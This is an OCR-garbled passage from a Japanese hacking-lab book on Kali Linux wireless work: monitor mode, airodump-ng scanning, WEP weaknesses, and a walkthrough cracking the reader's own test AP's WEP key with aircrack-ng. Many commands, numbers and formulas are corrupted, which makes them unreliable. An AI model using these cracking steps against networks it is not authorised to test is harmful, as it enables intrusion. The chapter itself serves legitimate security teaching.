# ifTconfig wlan9 up wlan9 を 有効 に する 。 


wlan0 を 無効 に し な いで 、 い き な り Monitor モー ド に 切り 替え よう と する と 、 成 
功 し た り 失 敗 し た り し ます 。 失敗 時 は 次 の よう に な り ま す 。 


# 1iwconfTig wlan9 mode monitor 


Error for wireless request "Set Mode" (8B96) : 


SET fahled on device wlan9 : Device or resource busy . 


確実 に 成功 する よう に 、 事前 に wlan0 を 無効 に する こと を 推奨 し ます 。 この 方 法 
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を 用 いる と 、 最終 的 に wlan0 が Monitor モー ド に な り ま す 。 
Monitor モ ー ド か ら Managed モー ド に 戻す と き を 考え る と 、wlan0 の まま だ と 
都合 が よい た め 、 本 書 で は 「iwconfiz コマ ンド で 変更 する 方 法 」 を 採用 し ます 。 


人 @ Kali で の コマ ンド 例 
airmon-ng コ マン ド で Monitor モ ー ド に 変更 する と 、 次 の よう に な り ま す 。 


Monitor モ ー ド に な っ て いる 
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Power Management : of 千 


1o no wireless extens1ons . 
(wlane の が なく な り 、w ゅ lan9mon が 現れ た ) 
FOOtQka11:<# 1 和 fcConT1g wlan9mon 
wlan9mon: 千 lags=4163<UP , BROADCAST , RUNNTNG , MULTITCAST> mtu 1599 
unspec 99-C9-CA-96 -A9- 31 - 99- 99 - 99- 99-99-99-99-99-99-99 .- 
txqueuelen 1999 (UNSPEC ) 
RX packets 9 bytes @ (9.9 B) 
RX errors 9 dropped 9 overruns 9 frame 9 
TX packets 9 bytes 9 (9.9 B) 
TX errors 9 dropped 9 overruns 9 carrier 9 col1isions 9 


(表示 され た の で 有効 に な っ て いる ) 


@ Monitor モー ド か ら Managed モー ド に 戻す 
Monitor モー ド か ら Managed モー ド に 切り 替え る に は 、 次 の よう に 入力 し ます 。 





# 1 ユ fconfig wlan9 down wlan9 を 無効 に する (w1ane の 認識 は 残っ て いる ) 。 
# 1wconfTig wlan9 mode managed 


# ュ †confTig wlan9 up wlan9 を 有効 に する 。 


Monitor モー ド に 変更 する と き は 、wlan0 を 無効 に し な く て も 成功 する こと が あ 
り ま し た 。 し か し 、Managed モード に 戻す と き は 、 い き な り iwconfig コマ ンド で 
変更 し よう と する と 、 次 の よう な エラ ー が 発生 し ます 。 そ こ で 、 い っ た ん 無効 に 
し て か ら 変 更 し な けれ ば な り ま せん 。 


rootka11:<# せ 1wconfTig wlan9 mode managed 
Error for wireless request "Set Mode" (8B96) : 


SET failed on device wlan9 : Device or resource busy . 


どう し て も うま くい か な い 場 合 に は 、 無線 LAN アダプタ ー を 抜き 差し する と 元 
に 戻り ます 。 
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誠 airodump-ngE で AP スキ ャ ン す る 
次 の 書式 で airodump-ng を 実行 する と 、AP ス キャ ン を 試み ます 。 こ の と き 、 
Monitor モー ド に し て お きま す C48)。 


# airodump-nEg < イン ター フェ ー ス 名 > 
イン ター フェ ー ス が wlan0 で あれ ば 、 次 の よう に な り ま す ( 図 6-71)。 


Poo て 人 ka11 :< athrodumD-ng wlan9 


File Edt View Search Iierminal Help 


CIPHER AUIH ES5S1D 


. WPA TKIP PSK <Lenq 
リリ に: ヤ 作 9 | PSK WARPS 
W ヒ DP WEP いやー ニ に 
リリ リヤ ャ 本 9 | し PSK Buf†a 
WPA2 CCNP PSK Buffa 
WPA2 CCHIP PSK Buff†a 
リリ ヤン に 1 、 全 還 | 1=h] > 


に に ド た すり STATTON 


DC:FB:O2:A3:7F:FC CC4:3A:BE :AA: DE: す 45 





図 6-71 airodump-ng で AP スキ ャ ン 中 


出力 内 容 は 3 つの 部 分 に 分 けら れ ま す 。 AP の 情報 表示 部 に お ける 主 な 項目 は 、 
表 6-13 の 通り で す (*49)。 


*48 : Managed モー ド の まま airodumpng で AP スキ ャ ン す る と 、 正 常に スキ ャ ン で き な い 場合 が 
あり 、 イ ンタ ー フ ェ ー ス が 勝手 に Monitor モ ー ド に 切り 替わり ます 。 


*49 : https//wwwr.alrcrackngorg/dokuuphp 7id=airodump-ng 
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表 6-13 airodump-ng の 出力 項目 


AP の MAC ア ドレ ス 。 

シグ ナル の 強 さ 。 単位 は dBm。 散 値 は 大 きい 方 が よい 。 

マイ ナス が 付い て いる の で 、-30 は -40 より よい 状態 と な る 。-80 より 小さ い 値 で 
も つなが る が 、 電 波状 況 は か な り 悪 い 。 


認証 プロ トコ ル 。 

・ PSK : WPA/WPA2 の 事前 共有 鍵 方 式 
* SKA : WEP の 共有 鍵 方 式 

・ MGT : 認証 サー バー 方 式 

・ OPN : オー プン シス テム 認証 方 式 


IESSID | 無線 LAN の ESSID。 





BSSID の と ころ に 何 か 表 示さ れれ ば 、 そ れ が スキ ャ ン で 見 つか っ た AP (の 
MAC ア ドレ ス ) に な り ま す 。 し ば らく 待ち 、1 件 も AP が 見 つか ら な い 場 合 は 、 何 
ら か の 異常 が ある と 考え られ ます C*50) 。 他 の 無線 LAN ア ダ プ ター を 試し て みて 
くだ さい 。 

スキ ャ ン を 停止 する 際 に は 、[Ctrl] + lc] キー を 押し ます 。 


*50 : airodump-ng や aircrackng に つい て の 質問 な ど は 、 公 式 サ イト の フォ ー ラ ム で 検索 ・ 投 稿 し 
て くだ さい (https//forum.aircrack-ng.org/) 。 
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"Operation not possible due to HF-kill" エラ ー の 解決 法 


airodump-ng で AP スキ ャ ン を 試み た 場合 、 炊 の よう に エラ ー が 発生 する こと が 
あり ます 。 


root 貼 ka11 :<# airodumD-ng wlan9mon 
1oct て 1 (STOCSTFFLAGS ) failed: Operat1on not possible due to RF-ki11 


Fa1led 1nit1al1z1ng w1reless card(s): wlan9mon 
この エラ ー が 発生 し た 場合 に は 、 次 の 一 連 の 手続 き を 試し て みて くだ さい 。 


root 人 Mal11:<# rfk11] 1ist 
9: phy9: Mireless LAN 
Soft blocked: no 
Hard blocked: yes 一 
rootMKa11:<# a1POn-ng 
PHY Tnterface Driver Chipset 





es に な っ て し \ る 。 E ま / マ pkz ブロ ッ ク さ れ て し \ る 。 


phy9 wlan の mon rt2899usb BUFFALO INC. (formerly Me1Co., Inc.) 
MLT-UC-GNM2 Mireless LAN Adapter [Ra]ink RT3979] 

FootQMKa11:<# POd rt2899usb カー ネル か ら モ ジュ ー ル を 取り 外す 。 

FootMKal1:<# FTk11] block al]1 

Foot 人 MKa11:<# FTk11] unblock al11 

FootWMKa11:<# mmOdDTODe rt2899usb カー ネル に モジ ュー ル を 追加 する 。 

rootMa11:<# FTk11] 11st 

1: phy1: Mireless LAN 一 国選 272 半 


Soft blocked: no 


Hard bl1ocked: no 半生 は 75 敵 


Foot 人 MKal1:<# a1rOn-ng 





PHY Tnterface Driver Chipset 
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phy1 wlan9 rt2899usb BUFFALO TNC. (former1y 


Me1Co., Tnc. ) MLI-UC-GNM2 Mireless LAN Adapter [Ra1ink RT3979] 


root 人 MKa11:<# airodumD-ng wlan9 
(AP が 表示 され る こと を 確認 ) 


毎回 起き ほ きる よう で あれ ば 、 次 の シェ ルス クリ プ ト を 用 意 し て お きま す 。 


"rfki11 .sh" フ ァイル 


#!/bin/bash 

echo Remove RT2899USB Module 
nmmod rt て 2899usb 

rfTki1] block a]1 

rfki11 unblock a11 

echo Add RT2899USB Module 
modprobe rt2899usb 

rfki11 unblock a11 

echo Brnng wlan9 Up 


ュ †con†1g wlan9 up 


ハッ キン グ ・ ラ ボ で スマ ホ を 活用 する 


ハッ キン グ ・ ラ ボ に お いて 、 ス マ ホ は ちょ っ と し た だ ネット ワー クス キャ ン や 動 
作 確認 する の に 非常 に 役立ち ます 。 

WiEi Analyzer は 、 無 線 LAN の 状況 を そ グ ラフ ィ カ ル に 表示 する Android アプ リ 
で す ("51)。 AP の 電波 の 強弱 ・ 混 雑 、 セ キュ リティ 強度 (WEP/WPA/WPA2) な 
ど を 確認 で きま す ( 図 6-72)。 


*51 : https//play.google.com/store/apps/detalsnd=com farproc.wihlanalyzer& を hl=ja 
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Fing は 、 各 種 ネ ットワーク ユー テイ ィ イリ ティ を 備え た だ Android アプ リ です C52)。 
例え ば 、LAN 内 を 高速 に Ping ス イー プ で きま す 。 稼働 する 端末 の IP アド レス を 単 
純 に 表示 する だ け で な く 、 機 器 の 種類 を 推測 し て アイ コン を 表示 し て くれ ます 
( 図 6.73)。 よ り 適 切な アイ コン ( 例 : ルー ター、 PC、 スマ ホ 、 仮想 マシ ン な ど ) が 
あれ ば 、 手 動 で 指定 し た り 、 名 称 を 付け た り で きま す 。 そ の 他 に 、 ポ ー ト スキ ャ 
ン や Wake on LAN に も 対応 し て いま す 。 


張る 83 療 * 補 本 4G43G4 四 83% 19:49 
nl ポ ll) の LAN > と 次 


アン ーー 
2 テ Wifi AnalyZer 3 時 間 前 26 の 13 テ バイ ス 


PR-400NE Ntteas ぴ nttwest 


gm DS261j (DS216j) Synoloaqy 


197 1668 ] 2 | ) さ 


四 Blackview BV8000Pro Blackview 


1068.1 .3 


アヤ GAROA: iDusiron: Intel 
。 192.168.1.5 an い 70-5A フ 1 FrA 


SAAWW 
Dr500hn 机 国 30G3.1 
ハ 宣 引 


1 


EX610U Netqear 
19/Z.106. 1 .6 FX61IU[] 


(⑨ 


FITeTIVStIiCK Amazon 


Fire TV AmazOn 





図 6-.72 WiFiAnalyzer に よる AP スキ ャ ン 図 6-73 Fing に よる Ping ス イー プ 


*52 : https//play.google.com/store/apps/details?id=com.overlook.android.hng&hl=ja 
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誠 WiFi に 接続 する 
Kali の 仮想 マシ ン の 場合 、 通 常 は 動 的 に IP アド レス が 割り 当て られ れ ば ば 十分 な 


の で 、 次 の 手順 で 無線 LAN に 接続 し ます 。 こ こ で は GUI を 使っ た 方 法 を 紹介 し ま 
を 


1 接続 状態 を 確認 する 
次 の コマ ンド の 結果 か ら 、 ま だ 無線 LAN に 接続 され て いま せん 。 


Poot 條 ka11:<# 1w wlan9 link 
Not connected . 


2 接続 し た い ネ ットワーク を 選択 する 

Kai の 右上 を 押し て プル ダウ ン さ せま す 。 | WiFi Not Connected」 > ISelect 
Network」 を 選び ます 。| Wi-Fi Networks」 画面 で 、 接 続 し た い AP を 選択 し て 、 
[Connect] ボタ ン を 押し ます 。 


3 パスワード を 入力 する (WEP/WPA/WPA2 の 場合 ) 
WEP/WPA/WPA2 で あれ ば 、 パス ワリ ー ド を 要求 され ます 。 正しい パス ワー ド を 
人 力 し て 接続 が 完了 する と 、 右 上 に WiFi アイ コン が 表示 され ます ( 図 6-74)。 





図 6-74 WiFi ア イコ ン が 表示 され た 


3 無線 LAN に 接続 し た こと を 確認 する 
iwconfip コ マン ド を 実行 する と 、 接続 し た ESSID、 接続 し た AP の BSSID が 表示 


され ます 。 ま た 、 ipconfig コ マン ド を 実行 する と 、wlan0 に IP アド レス が 動 的 に 割 
り 当 て られ て いる こと を 確認 で きま す 。 
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Foot 人 MkKa11:<# 1w wlan9 1ink 
Connected to 99:91:8e:D9:8d:98 (on wlanO9) 
SSTD: LAB3 
freq: 2427 
RX: 76632 bytes (556 packets ) 
TX: 4148 bytes (58 packets ) 
Signal: -46 dBm 
tx bitrate: 72.2 MBit/s MCS 7 short GL 


bss 和 †]ags: short- s1ot-t て 1me 
dt1im per1od: 1 
beacon 1nt: 199 


Poot 人 MKa11:<# 1wconfTig wlan9 
wlan9 TEEE 892.11 ESSTD: "LAB3" 
Mode :Managed Frequency:2.427 GHz Access Point: .」 
99: 91 : 8E :B9:8D:98 
Bit Rate=72.2 MD/S  Tx-Power=29 dBm 
Retry short 11imit:7 RTS thr:off Fragment thr:of† 
Encryption key:3132-3334-35 
Power Management : of 千 
Link Qua1ity=66/79 Signa] leve]=-44 dBm 
Rx inval1id nwid: の 9 Rx inva1id crypt:9 Rx inva1id frag : の 9 
Tx excessive retries: の Tnva1id misc:32 Missed 





beacon : の 9 
Foot 人 MkKa11:<# 1TConfT1g wlan9 
wlan9: flags=4163<UP , BROADCAST , RUNNTNG , MULTITCAST> mtu 1599 
inet 192.168.1.4 netmask 255.255.255.9 broadcast .-」 
192 .168.1.255 IP アド レス が 割り 当て られ た 。 
inet6 fe89: :762f:f477:73b8:a594 prefixlen 64 scopeid .」 
9x29<1ink> 
ether 99:c9:ca:97:6b:82 txqueuelen 1999 (Ethernet ) 
RX packets 69 bytes 12266 (11.9 KiB) 
RX errors 9 dropped 9 overruns 9 frame 9 
TX packets 36 bytes 5516 (5.3 KiB) 
TX errors 9 dropped 9 overruns 9 carrier 9 col1isions 9 
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5 無線 LAN を 切断 する 

切断 する 場合 に は 、Settings 画 面 の 左 ペ イン で 「WiFil を 選び ます 。 す る と 、 
AP が 一 覧 表示 され る の で 、 接 続 中 の AP の 歯車 アイ コン を 押し ます 。 詳細 画面 が 
表示 され る の で 、[Forget Connection] ボタ ン を 押し ます ( 図 6.75)。 す る と 、 そ 
の AP か ら 切 断 さ れ ま す 。 


Siqnal Ser Excelient 
Harduqle Adres5 OOCOCCA:9 た 6B:B2 
Last Uscd Todw 
| に Comnect automatrally 


| に MGke awaiabls to other users 


ー」 Restrlct backnround data usade 
ーー PD*robitetr for conmettom het | 


mm het hmye data harge or mi 





6-75 AP の 詳細 画面 


な お 、 サ ー バ ー と し て 運用 する の で あれ ば 、 起動 時 に 自宅 の 無線 LAN に 接続 し 
て 、 静 的 な IP アド レス が 割り 当て られ る と よい で し ょ う 。 そ の た め に は 、"wpa_ 
supplicantconf ファ イル を 用 意 し て 、wpa_supplicant コ マン ド で 接続 し ます 。 

一 方 、Kali の 場合 、 一 時 的 に ター ゲッ ト の 無線 LAN に アク セス する こと が 多い 
た め 、GUI で 接続 で きれ ば 十分 で し ょ う 。 


訪 WEP の 解析 

WEP (Wired Equivalent Privacy) と は 、 無 線 LAN の 賠 号 化 技術 の 1 つ で す 。 初 
期 の 無線 LAN で 使用 きれ て いま し た 。WEP に は 64 ビ ッ ト 版 と 128 ビ ッ ト 版 が あ 
り ま す 。 152 ビッ ト 版 や 256 ビ ッ ト 版 を 選択 で きる 無線 LAN 機 器 が あり ます が 、 こ 
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れ は IEEE 802.11 の 規格 で 定義 され て いる わけ で は な く 、 メ ー カ ー 独 自 の 規格 に 
な り ま す 。WEP は RC4 と いう スト リー ム 暗 号 (*53) が 使用 きれ て いま す 。 

も と も と WEP は 有線 LAN と 同等 の 安全 性 を 目指 し て いま し た が 、WEP の アル 
ゴリ ズム や 実装 方 法 に よっ て いく つか の 問題 が ある こと が 知ら れ て いま す 。 ほ と 
ん ど は RC4 の 安全 性 に 問題 が あっ た わけ で は な く 、WEP に よる RC4 の 使い 方 が 
好ま し く な か っ た こと に 起因 し ます ("54)。 現在 で は 、64 ビッ ト 版 と 128 ビ ッ ト 版 
の どちら も 使用 を 推 差 さ れ て いま せん 。 し か し 、 今 で も まれ に WEP の 無線 LAN 
を 発見 (全体 の 1 割 以下 ) で きる の で 、 こ こ で は WEP の 解析 方 法 を 解説 し ます 。 


@ WEP の 原理 


WEP の 無線 LAN ネ ットワーク を 構築 する に は 、AP に お いて WEP の 使用 を 有 
効 化 し 、 WEP キー を 登録 し ます 。 こ の ネッ トワ ー ク に 接続 する 端末 は 、 WEP キー 
を 用 いて アク セス し ます 。 ユー ザー の 鍋 点 で は 通常 WEP キ ー だ け を 意識 し ます 
が 、 シ ステ ム の 観点 で は WEP キー だ け で な く 、IV と いう 補助 情報 か ら 構成 され る 
暗号 化 鍵 を 用 いま す 。 

WEP の 暗号 化 鍵 は 、 表 6-14 の 要素 か ら 構 成 さ れ ま す 。 


ー IV と WEP キー 
| 
し 誠 還 還 パケ ッ ト ご と に 異な る デー タ 。 | 24 ビ ピッ ト 





WEP ォ ー |AP に 接続 に する た め の 64 ビ ピット 版 : 40 ビ ッ ト (ASCII 文 字 で は 5 桁 ) 
パス ワー ド 。 128 ビ ッ ト 版 :104 ビ ピット (ASCII 文 字 で は 13 桁 ) 


WEP で は 、 こ の 暗号 化 鍵 を その まま RC4 の 鍵 と し て 利用 し て 、 チ ェ ッ クサ ム 
C55) 付き の パケ ッ ト を 暗号 化し ます ( 図 6-76)。 


*53 : 共通 鍵 暗 号 の 一 種 で あり 、 平 文 を 小さ い 単 位 (ビッ ト 、 バ イト 、 ワ リード) で 順次 処理 する 暗 
号 で す 。 平文 と 暗号 化 鍵 (ある い は 疑似 乱数 ) の 排他 的 論理 和 を 取る こと で 暗号 化し ます 。 

54 : RC4 が 完全 に 安全 と いう わけ で は あり ませ ん 。 2013 年 に は RC4 の 新しい 攻撃 泌 が 発見 され 、 
13 x 22 の 暗号 文 か ら 鍵 長 128 ビッ ト の RC4 が 解読 され る こと が 知ら れ て いま す 。 

55 : パケ ッ ト の チェ ッ ク サ ム に は ICV (Integrity Check Valune) が 用 いら れ ま す 。 有線 LAN と 
同様 に CRC-32 ア ル ゴ リ ズム に より 作成 され ます 。 
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平文 : パ ケッ ト WEP キ ー 


WEP の 
暗号 化 ア ル ゴ リ ズム 


IV+WEP キ ー 


RC4 の 
暗号 化 ア ル ゴ リ ズム 





暗号 文 : 暗 号 化 され た パケ ッ ト 


図 6-76 WEP に よる 暗号 化 


IV は パケ ッ ト ご と に 異な る の で 、 各 パケ ッ ト が ユニ ー ク な 鍵 ス トリ ー ム を 持ち 
ます 。 ス トリ ー ム 暗号 は 共通 鍵 の 一 種 で ある た め 、 送 信者 と 受信 者 の 両者 が IV を 
知ら な けれ ば な り ま せん 。 そ の た め 、1IV は 平文 の 形 で パケ ッ ト に 格納 きれ て いま 
す 。 し か し 、IV は 24 ビ ッ ト と 短い た め 、 大 量 の パケ ッ ト を 収集 する と 、 同 じ IV を 
持つ 2 つ 以 上 の パケ ッ ト が 揃い ます 。 よ っ て 、 大量 の 1IV を 集め る こと で 、WEP の 
暗号 化 鍵 、 そ し て WEP キー を 特定 で きま す (詳細 は 後述 する )。 


WEP の 課題 


総 当 た り 攻 撃 に 対す る 脆弱 性 
数 十 万 一 数 百 万 の WEP で 暗号 化 さ れ た パケ ッ ト か ら 、WEP キ ー を 解析 で きる 
こと が 知ら れ て いま す 。 ま た だ た 、WEP キ ー を 絵 当 た り 攻 撃 す る ツー ル が イン ター 
ネッ ト 上 で 配布 され て いま す 。 
それ に 加え て 運用 上 の 問題 に より 、 使 用 され る 鍵 は 限定 され ます 。 本来 で あれ 
ば WEP の 仕様 上 、WEP キ ー に は 40 ビ ピット ある い は 104 ビ ッ ト を 設定 で きま す 。 
し か し 、GUI ベ ー ス の 設定 ツー ル に は 、 印字 可能 文字 ( 英 数 記号 ) し か 人 力 で き な 
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いも の が あり ます 。 8 ビット で 表現 で きる 値 は 256 (=28) 通り あり ます が 、 英 数 
記号 だ け を 考え る と 80 文 字 程 度 し か あり ませ ん 。 つ まり 、40 ビ ッ ト の WEP キ ー 
で あれ ば 256 通 り の 値 を 選べ る は ず な の に 、 印字 可能 文字 で あれ ば 805 通 り し か 選 
べ ま せん 。 そ の た め 、WEP の 仕様 で 想定 し て いた 状況 より 、 実 際 に は WEP キー 
を 推測 され や すい と いえ ます 。 

こう し た 問題 を 解決 する に は 、16 進数 で WEP キ ー を 入力 する こと で す 。 1 桁 の 
16 進 数 は 4 ビッ ト で 表現 で きる の で 、40 ビ ッ ト の WEP キ ー で あれ ば 、10 桁 の 16 
進数 を 入力 する こと に な り ま す 。 


アル ゴリ スム の 問題 

WEP で は 、IV と WEP キ ー を 合わ せ た だ デー タ を 鍵 た er と し ます 。 そ し て 、RC4 
の 暗号 化 ア ル ゴ リ ズム に 、 平 文太 と 鍵 た ey を 入力 し ます 。 内 部 の 疑似 乱数 生成 器 
で は 、 た er か ら 鍵 スト リー ム 太 を 生成 し ます 。 太 と 大 s の 排他 的 論理 和 (XOR) を 
計算 し て 、 暗 号 文 :> と し て 出力 し ます 。 


c 三 Enc(7, た ey) 三 772 XOR ん s 


ここ で 、 同 一 の WEP キ ー と 同一 の IV の 場合 を 考え ます 。 こ の と き 、 鍵 スト リー 
ム は 同一 に な り ま す 。 平文 を 77, 7 (772 近 77 ) と 鍵 ス トリ ー ム rs か ら 得 られ る 暗 
号 文 を を そ を れ ぞ れ c,c' と し ます 。 こ の と き 、 次 の 関係 が 成り 立ち ます 。 


c 三 ENC(7, ey) 三 7 XOR ん s 
c' = ニ ENC(7n, ey) = 7 XOR Xs 


7 王 7 が より 、cc/ 
上 記 の 式 か ら 、 次 の 関係 式 が 得 ら れ ま す 。 


cXORc' = (7 XOR ん Xs) XOR (7 'XOR ん s) 
cXORc' = ニ 7nXOR7 (た sXOR rs =0) 


ょ っ て 、 重複 する key と いう 特殊 な 状況 で は 、 こ の 関係 式 を 満た し ます 。 cc は 
既知 で す 。 7 妨 は 本 来 ど ちら も 未知 で す が 、 も し 片方 の 平文 如 が 既知 で あれ ば 、 
も う 片 方 の 平文 が 特定 で きま す 。 排他 的 論理 和 の 性 質 上 、 の 部 分 情報 が わ 
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か っ て いる だ け で も 有効 で あり 、 太 "の 同じ 桁 の 箇所 が 特定 で きま す 。 つ まり 、 部 
分 情報 が 漏れ る ろ る と いう こと で す 。 


と ころ で 、WEP キ ー は アク セス ポイ ント と 端末 で 共通 に 使わ れ て いま す 。 つ ま 
り 、 同 一 の 無線 LAN ネ ットワーク か WEP で 暗号 化 さ れ た パケ ッ ト (暗号 文 パ 
ケッ ト と 略す ) を 収集 すれ ば 、 同 一 の WEP キ ー と いう 条件 は 満た し て いま す 。 

同一 の IV の 暗号 文 パ ケッ ト の 有無 を 調べ る の も 容易 に で きま す 。 パ ケッ ト は 
ヘッ ダー 部 と デー タ 部 に 分 けら れ ま す 。 暗号 文 パ ケッ ト の デー タ 部 は 暗号 化 さ れ 
て いま す が 、 ヘ ッ ダ ー 部 分 は 暗号 化 さ れ て いま せん 。 ヘッダー 部 分 に は パケ ッ ト 
の 送信 先 ・ 送 信 元 に 関す る 情報 な ど が 記載 され て いま す 。 1IV の 値 も ヘッ ダー 部 分 
に 含ま れ て いる の で 、 暗 号 文 パ ケッ ト か ら IV の 値 を 確認 で きま す ( 図 6-77)。 











各 フ ィ ー ル ド は 
暗号 化 さ れ ま す 。 


802.11 ヘ ッ ダ ー 暗号 化 デー タ 部 





6-77 WEP 暗 号 文 パ ケッ ト の 基本 構造 


IV は 24 ビ ピット な の で 、 も し 完全 な 乱数 だ っ た と し て も 、 約 1.677 万 個 ( 三 24% = 
16.777.216) あれ ば 必ず 重複 し ます C56)。 これだけ の 量 の パケ ッ ト を 収集 する に 
は 約 半 日 か か る と いわ れ て いま す 。 と ころ が 、I1V は 完全 な 乱数 で は な く 、 あ る 種 
の 特徴 を 持ち ます 。 こ の 特徴 を 利用 する と 、4823 個 の 暗号 文 パ ケッ ト を 収集 する 
と 1IV が 50% の 確率 で 重複 する こと が 知ら れ て いま す 。 


*56 : 誕生 日 攻撃 に よれ ば 、 約 1006 万 個 ( ミ 1.2 xy224) あれ ば 509% 以上 の 確率 で TV が 重複 し ま 


ひ 
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さら に 、WEP が 利用 する RC4 の アル ゴリ ズム で は 、256 バ イト ご と に 鍵 ス ト 
リー ム が 繰り 返さ れ ま す 。 つ まり 、256 バ イト ご と に 同一 の 鍵 ス トリ ー ム を 用 いて 
暗号 化 さ れ ま す 。W+ (256 xc) バイ ト 目 (c は 0 以上 の 整数 ) は 同じ 鍵 ス トリ ー 
ム で 暗号 化 さ れ ま す 。 例え ば 、1 バ イト 目 の 暗 号 文 (WV=1, c=0) と 257 バ イト 目 
(=1, c=1) の 暗号 文 は 一 致し ます C57)。 

その 他 に も 、WEP の 特徴 か らい くつ か の 問題 点 が あり ます 。 平文 パケ ッ ト の 
デー タ 部 の 先頭 に は 、LLC ヘ ッ ダ ー の DSAP (宛先 サー ビス アク セス ポイ ント ) や 
SSAP (送信 区 サー ビス アク ヤギ スポ ボイン ド )、IEBE ペ ッ ダ ー の パー ジョ ン や ヘッ ゥ ラダ ー 
長 な ど が セッ ト さ れ ま す 。 こ れ ら の フィ ー ル ド は 、 パ ケッ ト が 変わ っ て も ほとん 
ど 変 わら な い 値 (固定 値 ) に な り ま す 。 こ れ は 平文 の 部 分 情報 を 絞り 込め る こと 
を 意味 し ます 。 平文 の 部 分 情報 が 判明 すれ ば 、 暗 号 文 は 既知 で ある た め 、 鍵 スト 
リー ム の 部 分 情報 が 解読 で きる こと を 意味 し ます 。 こ うし た ヘッ ダー の 特徴 を 利 
用 し て WEP の 鍵 ス トリ ー ム を 推測 する 攻撃 を FMS ア タッ ク と いい ます 。 約 60 個 
の 特徴 的 な 暗号 化 パ ケッ ト が あれ ば 、 約 509%% の 確率 で WEP キー を 推測 で きる こと 
が 知ら れ て いま す 。 

FMS ア タッ ク を 応用 し た PTW ア タッ ク 、 総 当たり 攻撃 を 改良 し た KoreK 
chopchop ア タッ ク な ど が 知ら れ て いま す 。128 ビ ッ ト 版 の WEP の 場合 、PTW ア 
タッ ク で あれ ば 約 8 万 パケ ッ ト 、 KoreK chopchop ア タッ ク で あれ ば 50 万 パケ ッ ト 
を 収集 すれ ば WEP キ ー の 解読 に 成功 する と いわ れ て いま す 。 


氏 WEP キー の 解析 

WEP キー の 解析 手法 に つい て 解説 し ます 。 こ の 実験 を 行う 場合 に は 、AP を 立 
ち 上 げ て 、 一 時 的 に WEP を 有効 に し て くだ さい (*58) 。 そ の 設定 内 容 は 、 次 の 通 
けっ の すず 。 


呈 作 2 ビッ ト 版 の WEP (59) 
| パス ワー ド |(WEP キ = エ ) | | 1234567890123" (ASCII 文 字 で 13 桁 ) (*60) 





*57 : ここ で は 暗号 文 が 一 致す る と いっ て いる だ け で す 。 も し 1 バイ ト が 解読 で きた と し て も 、 す 
ぐに すべ て が 解読 で きる わけ で は あり ませ ん 。 
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①)Monitor モー ド で ある こと を 確認 する 
無線 LAN ア ダ プ ター が Monitor モー ド で ある こと を 確認 し ます 。 





② WEP を 使用 し て いる AP を 探す 


WEP を 使用 し て いる AP を 探し ます 。ENC 列 が WEP に な っ て いれ ば 、WEP を 
使用 し て いる AP で す 。 





*58 : 実験 が 終 子 し た ら 、WEP は 無効 に し ます 。WEP が 有効 の まま だ と 、 狙 われ て し まう 芝 れ が 
ある た めで す 。 


*59 : 64 ビ ッ ト 版 の WEP の 場合 、 解 析 が すぐ に 終わ り ま す 。 パ ケッ ト の 収集 時 間 は 約 2 分 、IV は 
約 20.000 個 で し だ な だ 。 


60 : パス ワー ド は 任意 の 文字 別 と し ます が 、 いつ も 使用 する パス ワー ド は 避け て くだ さい 。 万 が 
一 外部 か ら 攻 撃 さ れ て パス ワー ド が 漏えい し た 際 に 、 壮 づる 式 に 攻撃 きれ て し まい ます 。 
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3 解析 に 必要 な 情報 を 調べ る 

WEP の 解析 に 必要 な 情報 を 確認 し ます 。 特 に 、 タ ー ゲ ッ ト AP の CH と BSSID 
が 必要 で す 。 

airodump-ng を 次 の 書式 で 実行 する と 、 キ ャ プチ ャ で きま す 。 -write オ プシ ョ ン 
に は 、 出 力 フ ァイル 名 の 接頭 語 (prefix) を 指定 し ます 。 例え ば 、'test' と 指定 す 
る と 、『test-O1.cap (同名 の ファ イル が すでに あれ ば "test-02.cap ) と いう ファ イル 
が 生成 され ます 。 





ここ で は 、 次 の よう に 実行 し まし た 。 





これ は 解析 が 終わ る まで 、 動 作 き させ た まま に し て お きま す 。 キ ャ プチ ャ ファ イ 
ル に 随時 デー タ が 追加 きれ て いき ます 。 


④)aircrack-ng を 実行 する 
別 Terminal を 起動 し て 、 解 析 ツ ー ル の aircrack-ng を 実行 し ます 。 引数 に ステ ッ 
プ ③ の 処理 で 生成 され る キャ プチ ャ ファ イル を 指定 し ます 。 





キャ プチ ャ ファ イル に デー タ が な い 場 合 、'Got no data packets from target 
networkI' と 表示 され て 、aircrack-ng は 終了 し ます 。 

別 の 端末 を 用 いて ター ゲッ ト AP に WEP で 接続 し 、 イ ンタ ーネット を 巡回 すれ 
ば 、 キ ャ プチ ャ ファ イル に デー タ が 蓄積 され ます 。 も し デー タ が あれ ば 、 aircrack- 
ng が 起動 し て パス ワー ド の 解析 が 始ま り ま す 。 お そら く 初 回 の 解析 に は 失敗 する 
で し ょ う 。 "Failed. Next try with xxxx IVs.′ と 表示 され た ら 、 解 析 に 失敗 し て い 
ます 。 こ れ は 解析 に 必要 な パケ ッ ト が 少な か っ た こと が 原因 で す 。 解析 に 失敗 す 
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ーー 


自動 的 に 待機 状態 に な り ま す 。 airodump-ng で の #Data が 5000 に な る まで 、 

aircrack-ng は 待機 状態 に な り ま す 。5000 を 超え た あたり で 、aircrackng は 自動 的 
に 解析 し 始め ます ("61) 。 こ の 解析 に 失敗 すれ ば 、 その 次 は 10000 に な る まで 待機 
状態 に な り ま す 。 以降 は 、15000、 20000、… と な っ て いき ます 。 つ まり 、5000 パ 
ケッ ト 増 える た びに 解析 が 行わ れ ま す 
解析 に 成功 する と 、KEY FOUND と 表示 され ます 。 これが 表示 され る まで 待 
つこ と に な り ま す 3 

デー タ の 集まり が 悪い と それ か ぶ け 時 間 が か か る こと に な り ま す 。 ア クセ ス す る 
端 木 を 増やす と よい で し ょ う 。 実験 の 環境 で は 、 ス マ ホ や タプ ブ プレット を ター ゲッ 
ト AP に 接続 する よう に 設定 し まし た 。 そ し て 、 パ ケッ ト の 量 を 増やす た め に 、 
YouTube で 動画 を ー 動 連続 再生 し まし た 。 な る べく パケ ッ ト 量 を 増やす た め に 
は 、 最 高 画質 に し て お く と さら に 有効 で す 。 

約 3 時 間 放 置 し た と ころ 、 解析 が 成功 し まし た 。 上 部 の メッ セー ジ に よる と 、 約 


149000 個 の IV を 収集 し て いま し た ( 図 6-78)。 
alrodump-ng が 動作 する Termlnal 
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図 6-78 WEP キ ー の 解析 に 成功 し た 


人 "に MY アナ 、 ナ ュ 7 きゃ と ンー ゾ / こ ルリ デー ーー で = に ラー コ ニ こ リエ ンー リオ | 2 
